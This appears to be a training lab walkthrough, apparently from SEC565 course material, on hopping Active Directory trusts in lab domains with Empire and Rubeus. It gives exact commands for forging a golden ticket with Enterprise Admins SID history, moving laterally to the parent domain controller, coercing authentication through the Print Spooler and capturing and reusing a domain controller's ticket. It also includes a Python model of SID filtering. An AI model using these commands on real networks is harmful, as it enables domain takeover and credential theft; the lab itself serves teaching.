# Lab 4: Hopping Trusts - Parent Child and Tree-Root

In this lab we will be interacting with the agent we spawned in Lab 3 on the domain controller of sandbox. If you have no agents, refer to Lab 3 for instructions on how to spawn a new one.

In this lab you will:

* Use the krbtgt hash obtained in Lab 3 to create a golden ticket with SID history
* Laterally move to the domain controller of pwnzone
* Use Rubeus monitor mode to watch for incoming TGTs
* Use coerced authentication through the Print Spooler service to trigger an authentication from treasureisland to pwnzone
* Import the KRBTGT of the DC of treasureisland
* Laterally move to the treasureisland DC

***

1. Now that we have the KRBTGT hash of sandbox.pwnzone.lab, we will also need the SID of pwnzone.lab. We can get the SID of the domain by enumerating domain trusts, which is a built-in post-exploitation module in Empire. Interact with the agent that you have running as svc\_entrypoint and select the following post-exploitation module: \
   \
   `powershell_situational_awareness_network_powerview_get_domain_trust`\
   \
   Set the API parameter to "true".

   <figure><img src="/files/gUrRRzmMVscTGwOEfiYU" alt=""><figcaption></figcaption></figure>
2. Take note of the SID of pwnzone.lab; we will need it in the next step.

<figure><img src="/files/J7ZKn5bZrzdm8S9bnkVs" alt=""><figcaption></figcaption></figure>

{% hint style="info" %}
Replace the sections between <> with the relevant values from the previous steps.
{% endhint %}

3. Time to create a golden ticket with SID history. In your agent we will have to use Rubeus once again: \
   \
   `csharp_assembly_assembly`\
   \
   file: select Rubeus from the dropdown list\
   parameters: \
   golden /aes256:\<replace with krbtgt aes256 hash> /user:administrator /domain:sandbox.pwnzone.lab /ldap /sids:\<replace with SID of pwnzone.lab>-519 /newpac /ptt

<figure><img src="/files/S75yLuKFmkeH3HhN6UKW" alt=""><figcaption></figcaption></figure>
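Why the `/sids:<SID of pwnzone.lab>-519` part of step 3 matters, as an added illustration that is not part of the lab, of Rubeus or of Empire: a small Python model of what SID filtering would do to the extra SIDs carried in a ticket that crosses a trust, next to the check a defender would run over those SIDs. The domain SIDs are constructed placeholders (the real ones come from step 2) and the filtering rule is a deliberately simplified assumption.

```python
import re

# Well-known RIDs of high-privilege groups. 519 (Enterprise Admins) is the RID
# the lab appends to the parent domain SID in Rubeus' /sids: parameter.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}
_DOMAIN_SID = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

def split_sid(sid):
    """Split an S-1-5-21 account or group SID into (domain SID, RID)."""
    m = _DOMAIN_SID.match(sid)
    if not m:
        raise ValueError("not a domain SID: " + sid)
    return m.group(1), int(m.group(2))

def effective_sids(account_sid, extra_sids, trusted_domain_sid, sid_filtering):
    """SIDs the resource domain honours from a ticket that came in over a trust.
    Simplified model (assumption): with SID filtering on, every extra SID that is
    not from the trusted domain is dropped; with it off, the default for
    parent-child trusts inside one forest, everything is kept."""
    kept = [account_sid]
    for sid in extra_sids:
        domain, _ = split_sid(sid)
        if sid_filtering and domain != trusted_domain_sid:
            continue  # filtered: the child cannot vouch for parent-domain SIDs
        kept.append(sid)
    return kept

def audit_extra_sids(extra_sids, trusted_domain_sid):
    """Defender view: why each SID-history entry of a cross-trust ticket is suspect."""
    findings = []
    for sid in extra_sids:
        domain, rid = split_sid(sid)
        if domain != trusted_domain_sid:
            findings.append(f"{sid}: not from trusted domain {trusted_domain_sid}")
        if rid in PRIVILEGED_RIDS:
            findings.append(f"{sid}: maps to {PRIVILEGED_RIDS[rid]}")
    return findings

# Constructed placeholder SIDs for sandbox.pwnzone.lab (child, the trusted side)
# and pwnzone.lab (parent / forest root); the real values come from step 2.
CHILD_SID = "S-1-5-21-1000000001-1000000002-1000000003"
PARENT_SID = "S-1-5-21-2000000001-2000000002-2000000003"
FORGED_EXTRA = [PARENT_SID + "-519"]  # what /sids:<SID of pwnzone.lab>-519 injects

if __name__ == "__main__":
    print(effective_sids(CHILD_SID + "-500", FORGED_EXTRA, CHILD_SID, sid_filtering=False))
    print(effective_sids(CHILD_SID + "-500", FORGED_EXTRA, CHILD_SID, sid_filtering=True))
    print(audit_extra_sids(FORGED_EXTRA, CHILD_SID))
```

With filtering off, the child domain's Administrator arrives at pwnzone-dc01 carrying the parent's Enterprise Admins SID; with filtering on, that SID is stripped before any access check sees it.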

4. If everything went smoothly, we should see a successful ticket import in the Tasks tab output of our last command.

   <figure><img src="/files/JY5DgbrKiemsNWz16ShO" alt=""><figcaption></figcaption></figure>
5. With the new ticket imported, we can now laterally move to the domain controller of pwnzone.lab. In your Empire agent's Interact tab, select \
   \
   `powershell_lateral_movement_invoke_psremoting`\
   \
   listener: \<select from dropdown>\
   computername: pwnzone-dc01.pwnzone.lab

<figure><img src="/files/nqELuZbVXnp3H9zQW76U" alt=""><figcaption></figcaption></figure>

6. Repeat step 5, as we will need two agents on the parent domain controller for later exploitation.
7. You now have two new agents on the parent domain controller, so it's time to hop to the treasureisland domain. \
   On one of your two agents we will run Rubeus in monitoring mode; on the other we will need to coerce authentication. \
   \
   Before we do that, we will need one more tool. Open up a terminal and type the following command: \
   \
   `wget -O Invoke-SpoolSample.ps1 https://raw.githubusercontent.com/jfmaes/SEC565-Tools/refs/heads/main/Invoke-SpoolSample.ps1` \
   \
   Keep note of the location where you saved Invoke-SpoolSample.ps1, as you will need it in a few moments.

{% hint style="info" %}
The runfor parameter indicates how much time you have to trigger the coerced authentication. If you need more than 2 minutes (120 seconds) to switch agents and execute the coercion, feel free to increase the runfor timer. Do note that you will not be able to open the output until the timer has expired, so don't set it too high either!
{% endhint %}

8. In one of your Empire agents (keep note of which one), run Rubeus in monitoring mode:\
   `csharp_assembly_assembly`\
   \
   file: select Rubeus from the dropdown list\
   parameters:

   monitor /targetuser:treasure-dc01$ /interval:2 /runfor:120 /consoleoutfile:C:\Users\Public\ticket.txt /nowrap

9. In your **other Empire agent on the DC**, run the coerced authentication attack:

   <figure><img src="/files/xji3kgpfXmvGGMHaI9wl" alt=""><figcaption></figcaption></figure>

10. Check the Output tab to see if the coerced authentication was triggered:

   <figure><img src="/files/bqbvTFRDeMciqjUZmoPf" alt=""><figcaption></figcaption></figure>

11. Go to the File Browser tab and navigate to C:\Users\Public\ticket.txt, then right-click it and select Download.

<figure><img src="/files/81QX8Sv0otFuuQwuZQad" alt=""><figcaption></figcaption></figure>

12. Check your Empire server terminal window for information on your download. If you see download errors, Rubeus is still in monitor mode and the file is therefore still locked. Wait a few more seconds (or however long you set the runfor parameter) until Rubeus is done.

    <figure><img src="/files/2iZ0vFOLgsDw4XaMsnwY" alt=""><figcaption></figcaption></figure>
13. Open up a new terminal window and navigate to the location displayed in your Empire logs:\
    \
    `cd <your location of ticket.txt>`
14. cat the output; it will look similar to this:

<figure><img src="/files/ibohdop5h7U6sp9Pr7l8" alt=""><figcaption></figcaption></figure>

15. Copy the base64-encoded ticket (it starts with do and ends with ==).
16. In your agent's Interact window, once again leverage Rubeus to pass the ticket: \
    \
    `csharp_assembly_assembly`\
    File: select Rubeus from the dropdown\
    Parameters: ptt /ticket:\<your base64 encoded ticket>

<figure><img src="/files/oqicZnWOTg9NpGJzSwU4" alt=""><figcaption></figcaption></figure>

17. Check the Output window to see if the ticket was imported successfully.

<figure><img src="/files/Ts40hXxlG7cdywh8quXv" alt=""><figcaption></figcaption></figure>

This is as far as we can go in the lab; perhaps you can figure out how to get to treasureisland? ;) \
\
Hope you had fun, feel free to keep exploring, and hope to see you in SEC565 at some point in the future :D

